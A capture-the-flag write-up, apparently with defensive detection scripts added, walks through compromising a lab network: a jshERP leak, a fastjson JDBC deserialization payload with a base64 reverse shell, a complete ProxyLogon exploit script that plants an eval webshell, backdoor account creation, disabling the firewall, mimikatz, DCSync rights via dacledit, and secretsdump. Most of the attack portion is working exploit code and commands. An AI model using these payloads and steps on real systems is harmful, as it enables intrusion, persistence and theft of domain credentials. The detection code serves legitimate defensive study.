A simple way to understand the relationship between Exchange, JDBC and FastJSON
Exchange fetches mail -> JDBC stores it in MySQL -> FastJSON converts it to JSON; a Java application can process enterprise mail and expose an API to the front end.

flag01

After getting the IP, first scan it with fscan.

Port 8000 hosts a web service; visiting it shows a 华夏ERP (jshERP) instance.

Searching for vulnerabilities in this CMS turns up an unauthenticated access issue at the following path:

/user/getAllList;.ico

Visiting it reveals the administrator account and password hash:

{"code":200,"data":{"userList":[{"id":63,"username":"季圣华","loginName":"jsh","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":1,"status":0,"description":"","remark":null,"tenantId":63},{"id":120,"username":"管理员","loginName":"admin","password":"e10adc3949ba59abbe56e057f20f883e","position":null,"department":null,"email":null,"phonenum":null,"ismanager":1,"isystem":0,"status":0,"description":null,"remark":null,"tenantId":null},{"id":131,"username":"测试用户","loginName":"test123","password":"e10adc3949ba59abbe56e057f20f883e","position":"","department":null,"email":"","phonenum":"","ismanager":1,"isystem":0,"status":0,"description":"","remark":null,"tenantId":63}]}}

Decoding the hash gives the plaintext password admin/123456.

After logging in to the back end with it, no exploitable point was found.

Detecting the fastjson deserialization vulnerability

First capture a random request: the back end's query function passes its content as JSON, so test the query parameter for fastjson deserialization.
payload:

{"@type":"java.net.Inet4Address","val":"bc50l0.dnslog.cn"}  # the value of val is the dnslog address

Send the payload; it has to be fully URL-encoded.

After sending it, dnslog shows a callback, which means the payload executed and fastjson deserialization is present.

Use the following payload to test the fastjson version: when fastjson <= 1.2.68 the code below executes successfully, otherwise it does not.

[
{
"@type": "java.lang.AutoCloseable",
"@type": "java.io.ByteArrayOutputStream"
}, {
"@type": "java.io.ByteArrayOutputStream"
}, {
"@type": "java.net.InetSocketAddress" {
"address": ,
"val": "lt1g65.dnslog.cn"
}
}
]

URL-encode the payload and send it.

There is a callback, so the code executed, which means fastjson <= 1.2.68.

fastjson <= 1.2.68 + JDBC deserialization for RCE

Following the challenge's JDBC hint, against fastjson <= 1.2.68 use JDBC to trigger a second deserialization with a CC chain and so achieve RCE.
Source of the fastjson payloads: https://github.com/safe6Sec/Fastjson

First start a malicious MySQL service on the attacker's server. Two tools are needed, MySQL_Fake_Server and ysoserial, and ysoserial-all.jar must be placed in the MySQL_Fake_Server directory.
The MySQL_Fake_Server config is as follows:
ysoserialPath is the path of the ysoserial jar just downloaded.
For the CC gadget chain choose CC6, the most universally applicable chain for Commons Collections 3; what follows bash is the reverse-shell payload, where the VPS IP and the listening port must be filled in.

{
    "config":{
        "ysoserialPath":"ysoserial-all.jar",
        "javaBinPath":"java",
        "fileOutputDir":"./fileOutput/",
        "displayFileContentOnScreen":true,
        "saveToFile":true
    },
    "fileread":{
        "win_ini":"c:\\windows\\win.ini",
        "win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
        "win":"c:\\windows\\",
        "linux_passwd":"/etc/passwd",
        "linux_hosts":"/etc/hosts",
        "index_php":"index.php",
        "ssrf":"https://www.baidu.com/",
        "__defaultFiles":["/etc/hosts","c:\\windows\\system32\\drivers\\etc\\hosts"]
    },
    "yso":{
        "Jdk7u21":["Jdk7u21","calc"],
        "CommonsCollections6":["CommonCollections6","bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNpcC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}"]
    }
}

Start the service

python3 server.py

Also listen on port 9999 (the port set in the config).

The payload to send is as follows:
The VPS IP and port must be set.
This payload forges a MySQL JDBC connection and uses autoDeserialize=true to trigger Java deserialization,
which leads to execution of the malicious command (a reverse connection to port 9999 on the VPS).
https://github.com/safe6Sec/Fastjson

{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "vps_ip", "portToConnectTo": 3306, "info": { "user": "yso_CommonsCollections6_bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC92cHNpcC85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" } }

Payload explanation

Note: the AI explanation of the config and the payload is:

  1. The payload JSON that is sent may be a real attack payload for the MySQL JDBC deserialization vulnerability, using autoDeserialize=true together with statementInterceptors to perform a Java deserialization attack; the user field contains a ysoserial CommonsCollections6 gadget chain that runs a base64-encoded command through bash -c and finally attempts a reverse shell to vps_ip:9999.
  2. The config JSON is probably used by ysoserial to generate the payload (the payload in 1 is generated from 2), which the attacker then injects into the JSON (filled into the JSON to be executed, disguised as MySQL connection parameters, so that code runs on the target server).

Both involve ysoserial deserialization; the goal is to execute system commands or even read sensitive files. If the MySQL server has autoDeserialize=true enabled, an attacker can trigger the deserialization vulnerability directly through the MySQL connection parameters and execute remote commands.

Exploitation flow

Listen on the port on the attacker's server

Start the fake MySQL service on the attacker's server

Send the payload

The fake MySQL server responds

A shell comes back with high privileges; read the flag directly.
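The two request bodies above (the fastjson AutoType probes and the JDBC autoDeserialize payload) share one shape a defender can key on: an "@type" key, often duplicated, naming a class the application never legitimately binds. The following is an added example, not code from the write-up or from the linked repositories, of how a WAF rule or log triage script would flag such bodies. The watched class list and the "dnslog" marker are assumptions drawn only from the payloads on this page, and the sample bodies are constructed (the ysoserial user string is truncated). It deliberately inspects the raw text rather than parsing first: the version probe is not valid JSON, so a detector that calls json.loads() before looking would never see its @type keys.

```python
import re
from urllib.parse import quote, unquote

# Class names taken from the payloads in this write-up. This list is an
# assumption about what to watch for, not a complete gadget inventory.
WATCHED_TYPES = {
    "java.net.Inet4Address": "DNS callback probe",
    "java.net.InetSocketAddress": "version probe (<= 1.2.68 check)",
    "java.lang.AutoCloseable": "duplicate-@type AutoType bypass",
    "java.io.ByteArrayOutputStream": "version probe helper",
    "com.mysql.jdbc.JDBC4Connection": "JDBC connection gadget",
}
# Matches every "@type" key, including the duplicated ones fastjson accepts.
AT_TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')
AUTODESER_RE = re.compile(r'"autoDeserialize"\s*:\s*"?true', re.I)
YSO_USER_RE = re.compile(r'"user"\s*:\s*"yso_')


def decode_body(raw: str, rounds: int = 3) -> str:
    """Undo URL encoding repeatedly; the write-up sends payloads fully encoded."""
    for _ in range(rounds):
        decoded = unquote(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw


def inspect_body(raw_body: str) -> dict:
    """Classify one request body. Works on the raw text on purpose: the version
    probe is not valid JSON, so json.loads() would reject it before any check ran."""
    body = decode_body(raw_body)
    types = AT_TYPE_RE.findall(body)
    findings = []
    if types:
        findings.append("autotype_key_present")
    if len(types) > 1:
        findings.append("multiple_@type_keys")
    for t in types:
        if t in WATCHED_TYPES:
            findings.append("watched_type:" + t)
    if AUTODESER_RE.search(body):
        findings.append("jdbc_autoDeserialize_true")
    if YSO_USER_RE.search(body):
        findings.append("ysoserial_marker_in_user")
    if "dnslog" in body.lower():          # crude heuristic, assumption for this example
        findings.append("dns_callback_domain")
    if any(f.startswith(("watched_type", "jdbc_", "ysoserial")) for f in findings):
        severity = "high"
    elif findings:
        severity = "medium"
    else:
        severity = "none"
    return {"types": types, "findings": findings, "severity": severity}


# Constructed samples: the three bodies the write-up sends, plus a benign query.
PROBE = quote('{"@type":"java.net.Inet4Address","val":"bc50l0.dnslog.cn"}', safe="")
VERSION_PROBE = ('[{"@type": "java.lang.AutoCloseable","@type": "java.io.ByteArrayOutputStream"},'
                 '{"@type": "java.io.ByteArrayOutputStream"},'
                 '{"@type": "java.net.InetSocketAddress" {"address": ,"val": "lt1g65.dnslog.cn"}}]')
JDBC_PAYLOAD = ('{"name": {"@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection",'
                ' "hostToConnectTo": "vps_ip", "portToConnectTo": 3306,'
                ' "info": {"user": "yso_CommonsCollections6_TRUNCATED", "password": "pass",'
                ' "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",'
                ' "autoDeserialize": "true", "NUM_HOSTS": "1"}}}')
BENIGN = '{"search": {"materialName": "bolt"}, "currentPage": 1, "pageSize": 10}'

if __name__ == "__main__":
    for label, body in [("probe", PROBE), ("version", VERSION_PROBE),
                        ("jdbc", JDBC_PAYLOAD), ("benign", BENIGN)]:
        r = inspect_body(body)
        print(f"{label:8} severity={r['severity']:6} {r['findings']}")
```

On the application side the durable fix is the one the findings point at: upgrade fastjson past 1.2.68, keep AutoType disabled (or use safeMode in later releases), and do not let user input reach a JDBC URL or connection-property map, since autoDeserialize and statementInterceptors are honoured by the client driver regardless of what the server does.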

flag02

Upload fscan and chisel
Start an HTTP server with python on the attacker's server

Download fscan and chisel from the shell

Internal network scan

Internal network information obtained

172.22.3.2 DC
172.22.3.9 XIAORANG-EXC01
172.22.3.12 compromised (the foothold)
172.22.3.26 XIAORANG-PC

Internal network tunnelling

Exchange ProxyLogon

Visit the Exchange service on the .3.9 machine.

The page source shows version 15.1.1591, which is Exchange Server 2016.

Exchange exploitation

Introduction
ProxyLogon is a Microsoft Exchange Server remote code execution (RCE) vulnerability disclosed in 2021, numbered CVE-2021-26855 (SSRF). It lets an attacker bypass authentication and reach the Exchange server directly, and combined with other vulnerabilities (such as CVE-2021-27065, remote code execution) finally take control of the whole server.

Exchange Server 2016 can be attacked with proxylogon.
CVE-2021-27065 can be used directly for RCE, provided the username is known; usually it is administrator@domain. If it is not known, it can be obtained through CVE-2021-26855 (SSRF). I used the tool directly here; the scripts below were not used.
CVE-2021-26855 SSRF

#!/usr/bin/env python3
# coding: utf-8
from urllib.parse import urljoin

from pocsuite3.api import POCBase, Output, register_poc, logger, requests


class DemoPOC(POCBase):
    vulID = ''
    version = '1.0'
    author = ['']
    vulDate = '2021-03-06'
    createDate = '2021-03-06'
    updateDate = '2021-03-06'
    references = ['']
    name = 'Microsoft Exchange Server SSRF漏洞'
    appPowerLink = ''
    appName = 'Microsoft Exchange Server'
    appVersion = 'Exchange Server 2013、Exchange Server 2016、Exchange Server 2019'
    vulType = ''
    desc = '''
    Microsoft Exchange Server SSRF漏洞
    '''
    samples = ['']
    install_requires = ['']

    def _verify(self):
        result = {}

        try:
            vul_url = urljoin(self.url, "/owa/auth/x.js")
            headers = {
                'Cookie': 'X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;'
            }
            resp = requests.get(vul_url, headers=headers, timeout=10)
            if resp.status_code == 500 and 'NegotiateSecurityContext' in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
        except Exception as e:
            logger.error(e)

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register_poc(DemoPOC)

Combined with CVE-2021-27065 for RCE

# -*- coding: utf-8 -*-
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import argparse
import sys
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)


fuzz_email = ['administrator', 'webmaste', 'support', 'sales', 'contact', 'admin', 'test',
              'test2', 'test01', 'test1', 'guest', 'sysadmin', 'info', 'noreply', 'log', 'no-reply']

proxies = {}
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

shell_path = "Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test11.aspx"
shell_absolute_path = "\\\\127.0.0.1\\c$\\%s" % shell_path
# webshell content
shell_content = '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>'

final_shell = ""

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))




if __name__=="__main__":
    parser = argparse.ArgumentParser(
        description='Example: python exp.py -u 127.0.0.1 -user administrator -suffix @ex.com\n如果不清楚用户名,可不填写-user参数,将自动Fuzz用户名。')
    parser.add_argument('-u', type=str,
                        help='target')
    parser.add_argument('-user',
                        help='exist email', default='')
    parser.add_argument('-suffix',
                        help='email suffix')
    args = parser.parse_args()
    target = args.u
    suffix = args.suffix
    if suffix == "":
        print("请输入suffix")

    exist_email = args.user
    if exist_email:
        fuzz_email.insert(0, exist_email)
    random_name = id_generator(4) + ".js"
    print("目标 Exchange Server: " + target)

    for i in fuzz_email:
        new_email = i+suffix
        autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
""" % new_email
        # print("get FQDN")
        FQDN = "EXCHANGE01"
        ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
                                                                             "User-Agent": user_agent},
                          verify=False, proxies=proxies)

        if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
            FQDN = ct.headers["X-FEServer"]
            print("got FQDN:" + FQDN)

        ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
            "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
            "Content-Type": "text/xml",
            "User-Agent": user_agent},
            data=autoDiscoverBody,
            proxies=proxies,
            verify=False
        )

        if ct.status_code != 200:
            print(ct.status_code)
            print("Autodiscover Error!")

        if "<LegacyDN>" not in str(ct.content):
            print("Can not get LegacyDN!")
        try:
            legacyDn = str(ct.content).split("<LegacyDN>")[
                1].split(r"</LegacyDN>")[0]
            print("Got DN: " + legacyDn)

            mapi_body = legacyDn + \
                "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                "Cookie": "X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;" % FQDN,
                "Content-Type": "application/mapi-http",
                "X-Requesttype": "Connect",
                "X-Clientinfo": "{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}",
                "X-Clientapplication": "Outlook/15.0.4815.1002",
                "X-Requestid": "{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456",
                "User-Agent": user_agent
            },
                data=mapi_body,
                verify=False,
                proxies=proxies
            )
            if ct.status_code != 200 or "act as owner of a UserMailbox" not in str(ct.content):
                print("Mapi Error!")
                exit()

            sid = str(ct.content).split("with SID ")[
                1].split(" and MasterAccountSid")[0]

            print("Got SID: " + sid)
            sid = sid.replace(sid.split("-")[-1], "500")

            proxyLogon_request = """<r at="Negotiate" ln="john"><s>%s</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="7" t="1">S-1-5-15</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
""" % sid

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                "Cookie": "X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;" % FQDN,
                "Content-Type": "text/xml",
                "msExchLogonMailbox": "S-1-5-20",
                "User-Agent": user_agent
            },
                data=proxyLogon_request,
                proxies=proxies,
                verify=False
            )
            if ct.status_code != 241 or not "set-cookie" in ct.headers:
                print("Proxylogon Error!")
                exit()

            sess_id = ct.headers['set-cookie'].split(
                "ASP.NET_SessionId=")[1].split(";")[0]

            msExchEcpCanary = ct.headers['set-cookie'].split("msExchEcpCanary=")[
                1].split(";")[0]
            print("Got session id: " + sess_id)
            print("Got canary: " + msExchEcpCanary)

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                # "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
                #     FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),

                "Cookie": "X-BEResource=Admin@{server_name}:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={sess_id}; msExchEcpCanary={msExchEcpCanary1}".
                format(server_name=FQDN, msExchEcpCanary1=msExchEcpCanary, sess_id=sess_id,
                       msExchEcpCanary=msExchEcpCanary),
                "Content-Type": "application/json; charset=utf-8",
                "msExchLogonMailbox": "S-1-5-20",
                "User-Agent": user_agent

            },
                json={"filter": {
                    "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                   "SelectedView": "", "SelectedVDirType": "OAB"}}, "sort": {}},
                verify=False,
                proxies=proxies
            )

            if ct.status_code != 200:
                print("GetOAB Error!")
                exit()
            oabId = str(ct.content).split('"RawIdentity":"')[1].split('"')[0]
            print("Got OAB id: " + oabId)

            oab_json = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
                        "properties": {
                            "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                           "ExternalUrl": "http://ffff/#%s" % shell_content}}}

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
                    FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
                "msExchLogonMailbox": "S-1-5-20",
                "Content-Type": "application/json; charset=utf-8",
                "User-Agent": user_agent
            },
                json=oab_json,
                proxies=proxies,
                verify=False
            )
            if ct.status_code != 200:
                print("Set external url Error!")
                exit()

            reset_oab_body = {"identity": {"__type": "Identity:ECP", "DisplayName": "OAB (Default Web Site)", "RawIdentity": oabId},
                              "properties": {
                                  "Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
                                                 "FilePathName": shell_absolute_path}}}

            ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
                "Cookie": "X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s" % (
                    FQDN, msExchEcpCanary, sess_id, msExchEcpCanary),
                "msExchLogonMailbox": "S-1-5-20",
                "Content-Type": "application/json; charset=utf-8",
                "User-Agent": user_agent
            },
                json=reset_oab_body,
                proxies=proxies,
                verify=False
            )

            if ct.status_code != 200:
                print("写入shell失败")
                exit()
            shell_url = "https://"+target+"/owa/auth/test11.aspx"
            print("成功写入shell:" + shell_url)
            print("下面验证shell是否ok")
            print('code=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami").StdOut.ReadAll());')
            print("正在请求shell")
            import time
            time.sleep(1)
            data = requests.post(shell_url, data={
                "code": "Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());"}, verify=False, proxies=proxies)
            if data.status_code != 200:
                print("写入shell失败")
            else:
                print("shell:"+data.text.split("OAB (Default Web Site)")
                      [0].replace("Name : ", ""))
                print('[+]用户名: '+ new_email)
                final_shell = shell_url
                break
        except:
            print('[-]用户名: '+new_email)
            print("=============================")
    if not final_shell:
        sys.exit()
    print("下面启用交互式shell")
    while True:
        input_cmd = input("[#] command: ")
        data={"code": """Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c %s").stdout.readall())""" % input_cmd}
        ct = requests.post(
            final_shell,
            data=data,verify=False, proxies=proxies)
        if ct.status_code != 200 or "OAB (Default Web Site)" not in ct.text:
            print("[*] Failed to execute shell command")
        else:
            shell_response = ct.text.split(
                "Name :")[0]
            print(shell_response)
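Both scripts above (the pocsuite3 SSRF check and the RCE chain) leave the same fingerprints at the Exchange front end: a client-supplied X-BEResource / X-AnonResource-Backend cookie steering the proxy to a back-end (often port 444 on the server itself), a static-looking /ecp/<random>.js path carrying that cookie, an msExchLogonMailbox header forged as S-1-5-20, DDIService calls against the OAB virtual directory, and finally a FilePathName pointing at an .aspx under FrontEnd\HttpProxy\owa\auth. The following is an added example, not code from the write-up or from the tools it names, of a triage script that checks request records for those indicators and sweeps the owa\auth directory for the dropped file. The request records, their field names and the file contents are constructed for the example; real deployments would read IIS / HttpProxy logs instead.

```python
import re

# Constructed request records. The field names are an assumption for this
# example, not a real Exchange or IIS log format.
SAMPLE_REQUESTS = [
    {   # the SSRF check from the pocsuite3 script
        "method": "GET", "path": "/owa/auth/x.js", "status": 500,
        "headers": {"Cookie": "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; "
                              "X-BEResource=localhost/owa/auth/logon.aspx?~3;"},
        "body": "",
    },
    {   # the final ResetOABVirtualDirectory call that writes the file
        "method": "POST", "path": "/ecp/k3xz.js", "status": 200,
        "headers": {"Cookie": "X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject"
                              "?schema=ResetOABVirtualDirectory&msExchEcpCanary=CANARY&a=~1942062522; "
                              "ASP.NET_SessionId=SESSION; msExchEcpCanary=CANARY",
                    "msExchLogonMailbox": "S-1-5-20",
                    "Content-Type": "application/json; charset=utf-8"},
        "body": ('{"properties":{"Parameters":{"FilePathName":"\\\\\\\\127.0.0.1\\\\c$\\\\'
                 'Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy'
                 '\\\\owa\\\\auth\\\\test11.aspx"}}}'),
    },
    {   # an ordinary OWA logon page load
        "method": "GET", "path": "/owa/auth/logon.aspx", "status": 200,
        "headers": {"Cookie": "OutlookSession=abc"}, "body": "",
    },
]

BACKEND_COOKIE_RE = re.compile(r"X-(?:BEResource|AnonResource-Backend)=([^;]+)", re.I)
STATIC_ECP_RE = re.compile(r"^/ecp/[^/]+\.(?:js|css|png|gif)$", re.I)
OWA_AUTH_DROP_RE = re.compile(r'FrontEnd\\+HttpProxy\\+owa\\+auth\\+[^"\\]+\.aspx', re.I)


def classify_request(req: dict) -> list:
    """Return the ProxyLogon indicators present in one request record."""
    reasons = []
    headers = {k.lower(): v for k, v in req["headers"].items()}
    cookie = headers.get("cookie", "")
    for m in BACKEND_COOKIE_RE.finditer(cookie):
        target = m.group(1)
        reasons.append("client-supplied backend routing cookie -> " + target)
        if ":444/" in target:
            reasons.append("routing to back-end port 444 on " + target.split("/")[0])
    if STATIC_ECP_RE.match(req["path"]) and "X-BEResource" in cookie:
        reasons.append("static-looking /ecp/ path used with X-BEResource")
    if headers.get("msexchlogonmailbox", "").upper() == "S-1-5-20":
        reasons.append("msExchLogonMailbox header set to the NetworkService SID")
    if "OABVirtualDirectory" in cookie:
        reasons.append("OAB virtual directory DDI call via back-end cookie")
    if OWA_AUTH_DROP_RE.search(req.get("body", "")):
        reasons.append("FilePathName targets an .aspx under owa\\auth (webshell drop)")
    return reasons


def looks_like_dropped_shell(aspx_text: str) -> bool:
    """True for the script-eval pattern the chain writes through ExternalUrl."""
    return ('runat="server"' in aspx_text and "eval(" in aspx_text
            and "Request[" in aspx_text)


# Constructed file contents for the sweep: the page's shell text and a benign page.
SAMPLE_FILES = {
    "test11.aspx": '<script language="JScript" runat="server"> function Page_Load(){/**/eval(Request["code"],"unsafe");}</script>',
    "logon.aspx": '<%@ Page language="C#" AutoEventWireup="true" %><html><body>Outlook</body></html>',
}


def sweep_owa_auth(files: dict) -> list:
    """Names of files under owa\\auth that match the dropped-shell pattern."""
    return sorted(name for name, text in files.items() if looks_like_dropped_shell(text))


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["method"], req["path"], "->", classify_request(req) or "clean")
    print("suspicious files:", sweep_owa_auth(SAMPLE_FILES))
```

The first indicator alone is the decisive one: a legitimate client never sets X-BEResource, so any request arriving with it from outside should be blocked at the front end and investigated, independent of the patch level.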

Exploitation flow

Use the proxylogon tool; exprolog can also be used.

proxychains python2 proxylogon.py 172.22.3.9 administrator@xiaorang.lab

A shell comes back, with SYSTEM privileges.

Add a user for convenience

net user nihao9 nihao9! /add
net localgroup administrators nihao9 /add

Add the user

Log in via Remote Desktop as that user

View the flag in the administrator directory

Commands to use when remote port 3389 is not open

# allow remote access on the machine by editing the registry
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# set the RDP listening port to 3389 via the registry
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
net stop TermService
net start TermService

# turn off the firewall
netsh advfirewall set allprofiles state off

flag04

Listing the users again, there is another user, Zhangtong.

Use mimikatz to dump credentials

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit

Hashes obtained

XIAORANG-EXC01$
04a7efba490c30f2db51cd893d09a11d
Zhangtong
22c7f81993e96ac83ac2f3f1903de8b4

Upload BloodHound to analyse the domain environment (it has to run on a domain machine, or on a machine reached through traffic forwarding); it shows that the XIAORANG-EXC01$ machine account has WriteDacl over domain users.

WriteDacl: the right to write the target's DACL, i.e. modify its access control entries; in other words, WriteDacl can be used to grant Zhangtong DCSync rights.

proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :04a7efba490c30f2db51cd893d09a11d -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

If the command fails (as in the figure above), download msada_guids.py into /usr/lib/python3/dist-packages/impacket.

After the right has been added, dump hashes as the Zhangtong user

proxychains python3 secretsdump.py xiaorang.lab/Zhangtong@172.22.3.2 -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm

The domain administrator's hash is obtained

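The two steps above, a DACL write on DC=xiaorang,DC=lab by the Exchange machine account and then a replication request from Zhangtong, are exactly what a domain controller records when directory-service auditing is on: event 5136 for the nTSecurityDescriptor change and event 4662 carrying the replication control-access GUIDs for the DCSync. The following is an added example, not code from the write-up or from impacket, that flags both in constructed event records. The field names mirror the XML data names of those events as a collector would flatten them (an assumption), the replication GUIDs are the standard DS-Replication-Get-Changes rights, and the DC$ allow-list and the GUID in the benign record are constructed for the example.

```python
import re

# Control-access right GUIDs that authorise directory replication (what DCSync asks for).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)
# Accounts expected to replicate: the DCs' machine accounts (assumption for this range).
REPLICATION_ALLOWLIST = {"DC$"}
DOMAIN_DN = "DC=xiaorang,DC=lab"

# Constructed events; field names follow the XML data names of 4662 / 5136.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "XIAORANG-EXC01$", "ObjectDN": DOMAIN_DN,
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "DC$", "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "Zhangtong", "ObjectName": DOMAIN_DN, "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {89e95b76-444d-4c62-991a-0facbeda640c}"},
    {"EventID": 4662, "SubjectUserName": "Lumia", "ObjectName": "CN=Lumia,CN=Users," + DOMAIN_DN,
     "AccessMask": "0x10",
     "Properties": "Write Property {aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa}"},  # constructed GUID
]


def dacl_change(event: dict):
    """5136 rewriting nTSecurityDescriptor on the domain head: a WriteDacl in use."""
    if event.get("EventID") != 5136:
        return None
    if event.get("AttributeLDAPDisplayName") != "nTSecurityDescriptor":
        return None
    if event.get("ObjectDN") != DOMAIN_DN:
        return None
    return {"kind": "domain_dacl_modified", "by": event["SubjectUserName"]}


def dcsync(event: dict):
    """4662 carrying replication GUIDs from an account that is not a domain controller."""
    if event.get("EventID") != 4662:
        return None
    guids = [g.lower() for g in GUID_RE.findall(event.get("Properties", ""))]
    rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
    if not rights:
        return None
    if event["SubjectUserName"] in REPLICATION_ALLOWLIST:
        return None        # DC-to-DC replication is the expected source of these GUIDs
    return {"kind": "dcsync", "by": event["SubjectUserName"], "rights": rights}


def triage(events: list) -> list:
    """Run both checks in event order; a DACL change followed by a DCSync from a
    principal that never replicated before is the sequence described above."""
    alerts = []
    for event in events:
        for check in (dacl_change, dcsync):
            alert = check(event)
            if alert:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

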